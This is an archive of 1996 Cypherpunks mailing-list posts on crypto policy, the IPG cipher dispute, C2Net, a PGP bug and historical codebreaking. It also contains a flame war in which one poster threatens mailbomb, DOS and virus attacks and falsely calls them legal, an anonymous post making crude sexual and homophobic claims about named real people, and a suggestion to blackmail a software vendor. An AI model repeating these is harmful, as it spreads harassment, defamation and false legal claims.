> of Legal Letters"  A J.D. is the only current valid
> Doctorate that you can do in plain "Law."

Incorrect.

A J.D. is not a true Doctorate, and even if it were, it would not be the
only current valid "Doctorate" that you can "do" in "plain Law."

Georgetown, as an example, offers a Doctorate in Law degree which requires
a J.D., an LL.M. and three years of legal teaching experience simply to
qualify for the program.

A Doctor of Judicial Science program is also available with many of the
same requirements.

Both programs require a dissertation and a defense of same.

San Marcos University is also known for an exceptional Doctor of Laws
program.

Incidently, LL.D.s are rare and generally useful only in European circles.

As usual, you have overextended your bounds and now find yourself swimming
in water over your head.

> > > 
> > > > Go to law school.  In the meantime, shut up.
> > > > 
> > > 
> > > Go and eat your swiss cheese, as that is apparently all you
> > > are good for.  My mercenaries are too busy to go to europe
> > > right now.
> > 
> > I prefer Chedder.
> > 
> > Be careful who you threaten.  It might get you in trouble.
> > 
> 
> Threatening to wipe out your location on the InterNet is
> not against ANY law whatsoever, and I can mailbomb you, do
> a DOS attack, fork-bomb attack and virus attack against you,
> all of which are perfectly legal.

Actually, they are not.  Unauthorized access of a computer system is a
crime.  Anyone who had a "doctorate" in law would know this.

I doubt your reference to mercenaries was merely a threat to my system,
but keep pushing if you like.

> > > Look asshole, I graduated from Law School with a Doctorate
> > > in 1975.  Now just go away and stop interfering with our
> > > American Net.

Which law school?  And did you do a dissertation?  What is its title?  Do
you practice?  What state are you licensed in?

> Face the real fact of life though dude.  There is absolutely NO LAW
> which prevents me from attacking and/or eliminating any address
> outside of the USA, that is, even if there were any law which would
> prevent me from doing the same thing to any non-government
> computer right here, which there is not.

Ok, do it.  We'll see.

> Your only protection on this Internet is to have a dozen different
> addresses to access from.  I can put a dozen computers up on
> a dozen different T1's right now, if need be.

I suggest a hobby which entails more physical activity.

--
Forward complaints to : European Association of Envelope Manufactures
Finger for Public Key   Gutenbergstrasse 21;Postfach;CH-3001;Bern
Vote Monarchist         Switzerland





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sun, 24 Nov 1996 13:57:14 -0800 (PST)
To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
Subject: Re: Recovery after flood
In-Reply-To: <Pine.SUN.3.94.961124113821.1802C-100000@polaris>
Message-ID: <Pine.SUN.3.94.961124165542.5157B-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 24 Nov 1996, Black Unicorn wrote:

> > Someone I know had their (paper) files submerged in water. Now all the papers
> > (most of them xerocopies, some photographs) are stuck together. They are, of
> > course, confidential to some degree. Can someone refer us to someone in
> > the Boston area who could assist in recovering the files?
> 
> Try the restoration departments of the suburb Boston Museums.
                                         ^^^^^^ suPurb
> Expect to pay out the nose and rectum.
> 
> > 
> > ---
> > 
> > Dr.Dimitri Vulis KOTM
> > Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps
> > 
> 
> --
> Forward complaints to : European Association of Envelope Manufactures
> Finger for Public Key   Gutenbergstrasse 21;Postfach;CH-3001;Bern
> Vote Monarchist         Switzerland
> 
> 

--
Forward complaints to : European Association of Envelope Manufactures
Finger for Public Key   Gutenbergstrasse 21;Postfach;CH-3001;Bern
Vote Monarchist         Switzerland





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@cypherpunks.ca (John Anonymous MacDonald)
Date: Sun, 24 Nov 1996 17:35:19 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: IPG Algorith Broken!
Message-ID: <199611250124.RAA07293@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain



At 7:10 AM 11/24/1996, The Deviant wrote:
>On Sun, 24 Nov 1996, John Anonymous MacDonald wrote:
>> At 6:56 PM 11/23/1996, The Deviant wrote:
>> >On Sat, 23 Nov 1996, John Anonymous MacDonald wrote:
>> >> The good news is that you can prove a negative.  For example, it has
>> >> been proven that there is no algorithm which can tell in all cases
>> >> whether an algorithm will stop.
>> >
>> >No, he was right.  They can't prove that their system is unbreakable.
>> >They _might_ be able to prove that their system hasn't been broken, and
>> >they _might_ be able to prove that it is _unlikely_ that it will be, but
>> >they *CAN NOT* prove that it is unbreakable.  This is the nature of
>> >cryptosystems.
>> 
>> Please prove your assertion.
>> 
>> If you can't prove this, and you can't find anybody else who has, why
>> should we believe it?
>
>Prove it?  Thats like saying "prove that the sun is bright on a sunny
>day".  Its completely obvious.

In other words, you can't prove it.  Thought so.

>If somebody has a new idea on how to attack their algorithm, it might
>work.  Then the system will have been broken.  You never know when
>somebody will come up with a new idea, so the best you can truthfully
>say is "it hasn't been broken *YET*".  As I remember, this was mentioned
>in more than one respected crypto book, including "Applied Cryptography"
>(Schneier).

Page number?

Perhaps it would be helpful to hear a possible proof.  If somebody
were to show that breaking a certain cryptographic algorithm was
NP-complete, many people would find this almost as good as proof that
the algorithm is unbreakable.

Then if a clever person were to show that the NP-complete problems
were not solvable in any faster way than we presently know how, you
would have proof that a cryptographic algorithm was unbreakable.

There is no obvious reason why such a proof is not possible.

diGriz






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "test" <avint@netvision.net.il>
Date: Sun, 24 Nov 1996 07:47:52 -0800 (PST)
To: <nobody@cypherpunks.ca>
Subject: Re: Does John Gilmore eat ass?
Message-ID: <199611241547.RAA00518@mail.netvision.net.il>
MIME-Version: 1.0
Content-Type: text/plain


unsuscribe
:-)

----------
> From: John Anonymous MacDonald <nobody@cypherpunks.ca>
> To: cypherpunks@toad.com; freedom-knights@jetcafe.org;
denning@cs.georgetown.edu; edyson@edventure.com
> Subject: Re: Does John Gilmore eat ass?
> Date: Sunday, November 24, 1996 10:31 AM
> 
> aga <aga@dhp.com> writes:
> 
> > The question is, does this John Gilmore really take it
> > up the ass?  Whether or not he is a FAGGOT is a very relevant issue
> > here, and it must not be overlooked.
> 
> The Evil Queen of Cypherpunks swings both ways.  John Gilmore also
> eats Dorothy Denning's (clean-shaven) pussy.  He won't eat Esther
> Dyson's pussy because it smells so bad.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com
Date: Sun, 24 Nov 1996 18:11:42 -0800 (PST)
To: cypherpunks@toad.com
Subject: The American Black Chamber - Yardley - Re: 1996 Codebreakers
Message-ID: <1.5.4.32.19961125021110.003ad168@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Adam Shostack <adam@homeport.org> wrote:
>	I just got a review copy of the new (1996) ed. of Kahn's The
>Codebreakers from my local used bookstore.  Its a little disapointing,
>about 20 new pages of material.  Kahn states in the forward that all
>the new material is in a chapter at the end.
.......
>	Anyway, copies should be in bookstores soon.  If you don't
>have a copy already, Kahn is the definitive history book, and is well
>worth having.

I just got a copy* of the 1981 "The American Black Chamber", by
Herbert O. Yardley, with a new (1981) intro by Kahn. ISBN 0-345-29867-5.
The original had been published in 1931, went through a couple printings,
and sold twice as many copies in Japan as the US.  In 1933 the US passed a 
law banning the publishing of any material that had been published in
diplomatic codes, and of course they withheld permission for future printings.  

Lots of good material on the state of crypto from WWI through the 1920s.
Crypto wasn't yet on a mathematical basis, though it was starting to
emerge in cryptanalysis.  After the World War ended, most of the traffic was
cracking diplomatic correspondence, especially for disarmament negotiations.
Getting users to take crypto seriously was a problem - most of the US
communications during the Spanish-American war used a sort of "rot-1898",
and even during the World War, military plans were often broadcast on
radio using wimpy codes, causing much damage to both sides.  
Codes were generally designed by people who didn't have extensive cracking 
experience, and therefore most new codes were easily cracked as well.
  
Yardley's organization diverted some of its expertise to cracking secret
inks, which were extensively used by German spies.  Language and cultural
differences caused surprising difficulties - there was one person they could
find who knew German shorthand systems, and finding Japanese language
experience after the war was difficult, since they didn't want to use
Japanes immigrants for security reasons and most missionaries wouldn't do
military work (both for ethical reasons and because it would lead the
Japanese government to crack down on missions to Japan, Korea, and China.)

Kahn speculates that the ability to crack Japanese naval codes in WWII was
probably enhanced by Yardley's people's work - PURPLE was much stronger
than the earlier Japanese diplomatic codes, but the Japanese Navy believed
that "This time, it's all right" (cable chief, to foreign minister :-),
when it wasn't.

Yardley reports at the end of the book that he believed the science of
cryptography would die out - AT&T had invented a cypher machine during
the war, and had invented one-time pads, and the combination would make
code clerks obsolete and codes unbreakable......

Shortly after that, in 1929, the new Secretary of State was shocked to 
discover that his department was funding eavesdropping. 
        "Gentlemen don't read each others' mail."

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# You can get PGP outside the US at ftp.ox.ac.uk
#     (If this is posted to cypherpunks, I'm currently lurking from fcpunx,
#     so please Cc: me on replies.  Thanks.)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Lynne L. Harrison" <lharrison@mhv.net>
Date: Sun, 24 Nov 1996 15:17:53 -0800 (PST)
To: cypherpunks@toad.com
Subject: Photobuster to beat radar...
Message-ID: <9611242318.AA23328@super.mhv.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Mime-Version: 1.0
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

To: cypherpunks@toad.com
Date: Sun Nov 24 18:19:39 1996

At URL: http://www.havenofhope.org/photobuster/photob2.html

Photobuster is a spin off from a specialty electronics company (Grand 
Systems) who saw the need for a system to foil the photo radar picture. We 
realize that people like your selves don't usually speed on purpose and 
can't afford to pay hundreds of semolies just because you look away from the 
speedometer from time to time.
Our easily installed electronic Photobuster unit is a an electronically 
triggered device that mounts in the rear window with a satellite unit that 
mounts at the license plate.  It watches the right side of the road for a 
photo radar setup. If you are driving at speeds in excess of the operators 
setting on the photo radar, it will attempt to photograph your car. When it 
does this the Photobuster senses the attempt and triggers a return response 
rendering the radar photo useless. It has an audible warning and a visual 
light to let you know each time you save 100 bucks. This unit only triggers 
if the photo radar attempts to photograph your car.
NOTE: Photobuster has nothing covering your plate as is with other filter, 
poleroid and lenticular optical devices. We are told it is not legal in most
areas, to install any kind of plastic cover over the plate, see through or 
not. 


************************************************************
Lynne L. Harrison, Esq.       |    "The key to life:
Poughkeepsie, New York        |     - Get up;
lharrison@mhv.net             |     - Survive;
http://www.dueprocess.com     |     - Go to bed."
************************************************************

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMpjYDD5A4+Z4Wnt9AQGEiwP+OwSodqT2IMQJIFxf/OPFIr7JSJJY7uWc
tBfpskpydWvpcKe49PZMbflNOsTgjuW/MyRXLwu8j/mMIEKqwe7KvYPEVUIHNjx3
by3dLMglaihuObbAViewOTS2mjat2bWtB24cGwHI1/94gc8trLlXS3VTtCQYcnkl
Btw1KpGDCek=
=pfBU
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Sun, 24 Nov 1996 18:24:13 -0800 (PST)
To: drose@AZStarNet.com
Subject: Re: Sameer R.I.P.
In-Reply-To: <199611250134.SAA12821@web.azstarnet.com>
Message-ID: <Pine.SUN.3.91.961124181724.21637E-100000@crl10.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Sun, 24 Nov 1996 drose@AZStarNet.com wrote:

> Sameer has decided, it seems, to get out of the anonymity
> business and pursue other interests.

Well, I guess you could call privacy guaranteed by strong crypto,
"other interests."  Seems right in the middle of what Cypherpunks
are all about.  If you like strong crypto, you'll love what's
coming next from C2Net.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: drose@AZStarNet.com
Date: Sun, 24 Nov 1996 17:35:11 -0800 (PST)
To: cypherpunks@toad.com
Subject: Sameer R.I.P.
Message-ID: <199611250134.SAA12821@web.azstarnet.com>
MIME-Version: 1.0
Content-Type: text/plain


C2 has a nice corporate-style fig leaf on its site.  Sameer has decided, it
seems, to get out of the anonymity business and pursue other interests.

Nice run while it lasted.

FYI, Sameer does mention that his recent legal brouhaha had nothing to do
with this decision.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: azur@netcom.com (Steve Schear)
Date: Sun, 24 Nov 1996 18:56:11 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Sameer R.I.P.
Message-ID: <v02140b03aebebb252aba@[10.0.2.15]>
MIME-Version: 1.0
Content-Type: text/plain


>C2 has a nice corporate-style fig leaf on its site.  Sameer has decided, it
>seems, to get out of the anonymity business and pursue other interests.
>
>Nice run while it lasted.
>
>FYI, Sameer does mention that his recent legal brouhaha had nothing to do
>with this decision.

C2 is still appears comitted to anonymity, they just don't want consumer
accounts which were unprofitable.  C2 will still support anonymous Web
pages and offers the Web-access Anonmizer.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sun, 24 Nov 1996 16:40:12 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: IPG Algorith Broken!
In-Reply-To: <3.0.32.19961124115028.00dc1358@mail.teleport.com>
Message-ID: <c2aXXD25w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Alan Olsen <alan@ctrl-alt-del.com> babbles:
> At 04:00 AM 11/24/96 -0500, Black Unicorn wrote:
> >On Sun, 24 Nov 1996 eli+@gs160.sp.cs.cmu.edu wrote:
> >
> >> Maybe this one's different from all of those.  How valuable a secret
> >> would you like to wager on that?  If IPG wants credibility, they should
> >> retain a respected cryptographer, or several, to attack their scheme.
> >
> >"They" attempt this nearly daily by trying to taunt c'punks into
> >evaluating the product for free.
>
> Then someone should not do it for free.  They should do it as a "data
> recovery tool", advertise widely, make a few bucks, and show what a piece
> of crap the IPG snakeoil is in the first place.
>
> Cracktools are starting to become a profitable business as more and more
> snakeoil products appear on the market.  (Most are marketed to law
> enforcement, but that will probibly change...)
>
> There is a buck or two to be made here.

There's probably more money to be made by blackmailing the snake-oil
peddler (pay me so I don't release the cracktool for your crap) than
by selling the cracktools themselves.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Sun, 24 Nov 1996 17:36:57 -0800 (PST)
To: cypherpunks@toad.com
Subject: kickouts done the Cypherpunks way...
Message-ID: <199611250134.TAA23699@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Hi,

Suppose Mr. X, owner of foobarpunks mailing list, wants to kick out Mr. Y,
for his obnoxious letters to the mailing list.

Mr. X, however, is concerned that Mr. Y would subscribe through some
proxy address and would continue replying to messages to foobarpunks.

It is assumed that the only person out of the whole universe, Mr. Y, 
cannot be trusted. The problem is that X does not know which of the 
subscribers is Mr. Y.

The question is, is there a technical way to disable Mr. Y from
reading the list, or detect which subscription address is a proxy for Y?

If we assume that, at the moment when Y was kicked out, he was not
subscribed through any other addresses, the solution becomes simple:
for any new subscription request we require a letter of recommendation 
from some other subscriber. Since other subscribers are presumed to
be trustworthy, their recommendations would be sufficient. It is 
actually being done in some of the mailing lists.

The problem becomes more complex when Mr. Y is already presumed to have
infiltrated the mailing list, possibly through several proxy addresses.

Is there any way to detect/find which if the subscriber is Y? One of
the simple-minded solutions is to _mutate_ mailing list messages
so that all readers get slightly different copies of mailing list messages
for each recipient. (Such mutations may include common misspellings,
inserting spaces, etc)

If the mailing list bot keeps track of what changes were made in 
messages to which individual, and if we assume that Mr. Y has to quote 
significant parts of messages he replies to, finally the variations
in messages may be reconciled with variations in quoted parts.

Mr. Y is not stupid, and may go as far as comparing letters, received
through different proxy addresses, in order to detect "variations"
and avoid quoting them.

The question is, is there a strategy of making variations and detecting
them in quotes to finally catch Mr. Y?

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sun, 24 Nov 1996 23:26:57 -0800 (PST)
To: cypherpunks@count04.mry.scruznet.com
Subject: Re: Recovery after flood
In-Reply-To: <199611242147.NAA02431@count04.pleiku.com>
Message-ID: <BNcXXD26w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Thanks Kelly!! I'll tell them to try the freon tape cleaner. (I don't have
the papers myself.) From what I've seen, it looked like the copier's toner
got dissolved in the water and is acting as a glue. The files were submerged
for a while (stupid) and when they pulled them out, they let them dry w/o
separating the pages (even more stupid). I hope there will still be some
images on the pages if we get them unstuck :-) :-) :-)

This reminds me of how we once recovered a piece of electrical equipment
from seawater, and we were told to basically keep in in a bucket of water
until it could be cleaned properly. Changing the surroundings even for
something that seems more "natural" is always additional stress on the
damaged equipment and loses more information.

Thanks again for the advice - I appreciate it because it would be quite a
pity if all of it were lost.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: drose@AZStarNet.com
Date: Sun, 24 Nov 1996 19:11:57 -0800 (PST)
To: Sandy Sandfort <sandfort@crl.com>
Subject: Re: Sameer R.I.P.
Message-ID: <199611250311.UAA05745@web.azstarnet.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 24 Nov 1996 Sandy Sandfort <sandfort@crl.com> wrote:

>On Sun, 24 Nov 1996 drose@AZStarNet.com wrote:
>
>> Sameer has decided, it seems, to get out of the anonymity
>> business and pursue other interests.
>
>Well, I guess you could call privacy guaranteed by strong crypto,
>"other interests."  Seems right in the middle of what Cypherpunks
>are all about.  If you like strong crypto, you'll love what's
>coming next from C2Net.

Point well taken.  Most people who are in the market for a Web server,
however, are cognizant of the fact that along with Netscape, Microsoft, Open
Market, O'Reilly et al, Sameer has been for some time now selling a well
regarded product: namely, his proprietary version of Apache.

I guess my point was that, notwithstanding Sameer's estimable commercial
software offerings, the *news* is that 
he has, to repeat myself, abandoned the anonymity business with respect to
many of his traditional public Internet services.

Certainly, no slight was intended.  I "like strong crypto", so I naturally
look forward to stuff from C2Net that, in your opinion, I'll "love."

David M. Rose
drose@azstarnet.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adamsc@io-online.com (Adamsc)
Date: Sun, 24 Nov 1996 20:27:51 -0800 (PST)
To: "snow" <deviant@pooh-corner.com>
Subject: Re: IPG Algorith Broken!
Message-ID: <19961125042533203.AAA253@rn07.io-online.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 24 Nov 1996 02:20:25 -0600 (CST), snow wrote:

>> > diGriz

>> Use an anon. remailer and sign your posts.  Brilliant.  Just brilliant.

>     The Stainless Steel Rat. Harry Harrison.

Just as an off-topic SF note, how many people on the list read this series
during their formative years?  How many of them thought it was a guide book?

#  Chris Adams  <adamsc@io-online.com> | http://www.io-online.com/adamsc/adamsc.htp
#  <cadams@acucobol.com>                 | send mail with subject "send PGPKEY"
"That's our advantage at Microsoft; we set the standards and we can change them."
   --- Karen Hargrove, Microsoft (quoted in the Feb 1993 Unix Review editorial)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Mon, 25 Nov 1996 17:16:42 -0800 (PST)
To: markm@voicenet.com
Subject: Re: Announce PGP263UI (long message)
In-Reply-To: <Pine.LNX.3.95.961123215230.4222A-100000@gak.voicenet.com>
Message-ID: <199611242036.UAA00120@server.test.net>
MIME-Version: 1.0
Content-Type: text/plain



Mark M <markm@voicenet.com> writes:
> Steve Crompton <sunray@globalnet.co.uk> writes:
> > Note that I personally have not done very much of the actual coding on
> > this version.  However if bugs are reported or constructive
> > suggestions for improvements made I will pass them on to the
> > individual(s) who have done the bulk of the work to make this release
> > possible.  I am assured that continuing support will be provided.
> 
> I found two bugs so far:
> 
> This version doesn't recognize either .pgprc or pgp.ini as valid config file
> names.  It is very minor, but this functionality is stated in the manual.
> 
> One of my favorite options, +makerandom, isn't supported in this version.
> This is an undocumented option, but it is useful in many situations.

makerandom is broken anyway.  Security alert: don't use +makerandom in
pgp2.6.3/pgp2.6.2.  The random number generator isn't initialised
before use.  (Details courtesy of Jeff Schiller I haven't looked that
up in the source in detail yet).

> This version uses +version_byte instead of +Legal_Kludge, but I consider that
> a feature.  I haven't had time to experiment with the "Charset:" header.  One
> other minor problem is that ClearSig doesn't default to "on".  This could
> cause some frustration with new users.

I was under the impression that with the Legal_Kludge option for
pgp263i, that it already was compatible with old versions of pgp using
the version byte of 2.

What else does pgp263ui offer?  The GNU license?  What about pgp3?
Some people aren't going to be very happy if you do a GNU version of
that, as GNU doesn't preclude selling commercially provided that
source is provided.

Adam

PS Steve and friends: I've got some stealth code close to usable in
the form of a patch to pgp263 if you want it :-)
--
print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
)]}\EsMsKsN0[lN*1lK[d2%Sa2/d0<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<J]dsJxp"|dc`




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ben Laurie <ben@gonzo.ben.algroup.co.uk>
Date: Sun, 24 Nov 1996 13:40:23 -0800 (PST)
To: The Deviant <deviant@pooh-corner.com>
Subject: Re: IPG Algorith Broken!
In-Reply-To: <Pine.LNX.3.94.961124150747.15531B-100000@random.sp.org>
Message-ID: <9611242036.aa13728@gonzo.ben.algroup.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


The Deviant wrote:
> 
> -----BEGIN PGP SIGNED MESSAGE-----
> 
> On Sun, 24 Nov 1996, John Anonymous MacDonald wrote:
> 
> > 
> > At 6:56 PM 11/23/1996, The Deviant wrote:
> > >On Sat, 23 Nov 1996, John Anonymous MacDonald wrote:
> > >> The good news is that you can prove a negative.  For example, it has
> > >> been proven that there is no algorithm which can tell in all cases
> > >> whether an algorithm will stop.
> > >
> > >No, he was right.  They can't prove that their system is unbreakable.
> > >They _might_ be able to prove that their system hasn't been broken, and
> > >they _might_ be able to prove that it is _unlikely_ that it will be, but
> > >they *CAN NOT* prove that it is unbreakable.  This is the nature of
> > >cryptosystems.
> > 
> > Please prove your assertion.
> > 
> > If you can't prove this, and you can't find anybody else who has, why
> > should we believe it?
> 
> Prove it?  Thats like saying "prove that the sun is bright on a sunny
> day".  Its completely obvious.  If somebody has a new idea on how to
> attack their algorithm, it might work.  Then the system will have been
> broken.  You never know when somebody will come up with a new idea, so the
> best you can truthfully say is "it hasn't been broken *YET*".  As I
> remember, this was mentioned in more than one respected crypto book,
> including "Applied Cryptography" (Schneier).

It seems appropriate to quote Schneier on the subject:

"Those who claim to have an unbreakable cipher simply because they can't break
it are either geniuses or fools. Unfortunately, there are more of the latter in
the world."

And...

"Believe it or not, there is a perfect encryption system. It's called a
one-time pad..."

Cheers,

Ben.

-- 
Ben Laurie                Phone: +44 (181) 994 6435  Email: ben@algroup.co.uk
Freelance Consultant and  Fax:   +44 (181) 994 6472
Technical Director        URL: http://www.algroup.co.uk/Apache-SSL
A.L. Digital Ltd,         Apache Group member (http://www.apache.org)
London, England.          Apache-SSL author




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sun, 24 Nov 1996 23:22:28 -0800 (PST)
To: cypherpunks@toad.com
Subject: P.S. on chain letters
Message-ID: <F4eXXD27w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


A week or so ago I was ranting about chain letters and other memes - well,
today I came across some well-research Web site hosted by Kenneth Han (Black
Unicorn may know him) - check out http://www.gwu.edu/~khan if you care
about more analysis of the Craig Sherhorn phenomenon.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ben Laurie <ben@gonzo.ben.algroup.co.uk>
Date: Sun, 24 Nov 1996 14:53:54 -0800 (PST)
To: The Deviant <deviant@pooh-corner.com>
Subject: Re: IPG Algorith Broken!
In-Reply-To: <Pine.LNX.3.94.961124223038.17852A-100000@random.sp.org>
Message-ID: <9611242151.aa13916@gonzo.ben.algroup.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


The Deviant wrote:
> On Sun, 24 Nov 1996, Ben Laurie wrote:
> > And...
> > 
> > "Believe it or not, there is a perfect encryption system. It's called a
> > one-time pad..."
> > 
> 
> Ahh... an OTP isn't unbreakable.  Its just so encredibly breakable that
> you never know which break was the correct one ;)

Note that Schneier says "perfect", not "unbreakable".

Cheers,

Ben.

-- 
Ben Laurie                Phone: +44 (181) 994 6435  Email: ben@algroup.co.uk
Freelance Consultant and  Fax:   +44 (181) 994 6472
Technical Director        URL: http://www.algroup.co.uk/Apache-SSL
A.L. Digital Ltd,         Apache Group member (http://www.apache.org)
London, England.          Apache-SSL author




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Deviant <deviant@pooh-corner.com>
Date: Sun, 24 Nov 1996 14:35:57 -0800 (PST)
To: ben@algroup.co.uk
Subject: Re: IPG Algorith Broken!
In-Reply-To: <9611242036.aa13728@gonzo.ben.algroup.co.uk>
Message-ID: <Pine.LNX.3.94.961124223038.17852A-100000@random.sp.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Sun, 24 Nov 1996, Ben Laurie wrote:

> It seems appropriate to quote Schneier on the subject:
> 
> "Those who claim to have an unbreakable cipher simply because they can't break
> it are either geniuses or fools. Unfortunately, there are more of the latter in
> the world."
> 

Thanks (I still can't afford a cp to quote from)

> And...
> 
> "Believe it or not, there is a perfect encryption system. It's called a
> one-time pad..."
> 

Ahh... an OTP isn't unbreakable.  Its just so encredibly breakable that
you never know which break was the correct one ;)

> Cheers,
> 
> Ben.
> 

 --Deviant
   PGP KeyID = E820F015 Fingerprint = 3D6AAB628E3DFAA9 F7D35736ABC56D39

The only constant is change.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMpjM7TCdEh3oIPAVAQGGEgf+Od+v0JWudWMXE2aOTjc4boMaexa7cMwx
D1fpO/s07jmMmhtT/gK0f1vw1+hxD3tAvhZniFYaGjmCiWFJK3l/kM/K6a8JPnev
6GhHLxGue9YDJm2uRtWjWMne179OxmWkv7kywM5L3f7/llQ83Q8AegG89s+BKgvb
Hf5/kvI4aTO7eJ1XRzbN6SUfWJm69raQcHPWVP626yZ8MSFBcCx+Cc5E3heFYePf
dxps/e5inAvqPlbY1EtkLfdvMk+FAJBzoUURvKYxLsf2vvVQ9CuPqfP4oRfjRCsv
f+3EMVNCWJ3lPUOEGU05T5yDPema8sX9gnrpDOf1y9+8v5jcphOMqg==
=kqPj
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Sun, 24 Nov 1996 20:32:50 -0800 (PST)
To: cypherpunks@toad.com
Subject: Stewart Baker on HP-Intel-Microsoft Crypto Announcement
Message-ID: <Pine.sos5.3.91.961124233126.12016D-100000@cp.pathfinder.com>
MIME-Version: 1.0
Content-Type: text/plain



---------- Forwarded message ----------
Date: Sun, 24 Nov 1996 22:14:34 -0500
From: Dave Farber <farber@cis.upenn.edu>
To: interesting-people mailing list <interesting-people@eff.org>
Subject: IP: HP-Intel-Microsoft Crypto Announcement

Date: Sun, 24 Nov 96 21:43:47 EST
From: "Stewart Baker" <sbaker@mail.steptoe.com>
To: farber@cis.upenn.edu
Subject: HP-Intel-Microsoft Crypto Announcement

     

  

I also attended the Hewlett-Packard/Intel/Microsoft announcement, and 
I thought it might be useful to offer a slightly different perspective
from Ross Stapleton-Gray's and Declan McCullagh's notes.

It's understandable, given the coincidence of the two events, that 
Ross and Declan saw the announcement as tied to the government's key 
recovery initiative, but I think they may have been led astray by the 
timing.  As I understand it, the HP framework is not so much an 
embrace of government regulation in this field as a recognition by 
some major companies that governments simply are not going to get out 
of the business of regulating encryption soon, or at least not soon 
enough for the people who want to build a secure global network right 
now.  I see the announcement as an effort by business to sidestep the 
policy debate, to say to the politicians, "Whatever crypto policy you 
decide to adopt, this system will work with it."

So, in my view, the HP technology is significant mainly for its 
flexibility rather than for supporting key recovery or any other 
particular policy.  It allows PC manufacturers to build into their 
products virtually any form of encryption that a user could want and 
to ship those products around the world without falling afoul of 
export controls or domestic regulations on encryption.

>From a security point of view, this is important because it allows 
commoditization of security hardware.  One of the reasons why 
encryption hardware has not spread is that individualized licensing 
and local restrictions make it imprudent to include hardware security 
as a standard feature in PCs aimed at mass markets.  The HP system has
safeguards that have evidently persuaded governments that they can 
allow mass market sales of hardware encryption without giving up their
current regulatory authority.

What does this mean for the government's key escrow policy?  First, as
we heard at the news conference, HP's system will run the TIS 
commercial key recovery system (and presumably the CertCo./Bankers 
Trust system as well).  So it will make key recovery products 
available to buyers.  But it will also run 40-bit encryption, DES, and
other strong algorithms without escrow.  The customer decides what 
crypto to use; the framework doesn't favor one of those technologies 
over the other, except that it allows customers to buy strong 
key-recovery crypto today with the knowledge that the hardware won't 
become obsolete tomorrow if government policies change and something 
more attractive comes along.

As a separate point, I'm not sure Declan is right to call this 
vaporware.  The basic hardware has been available for a while.  (I saw
an early demo a few years ago.)  It sounds as though the R&D is done; 
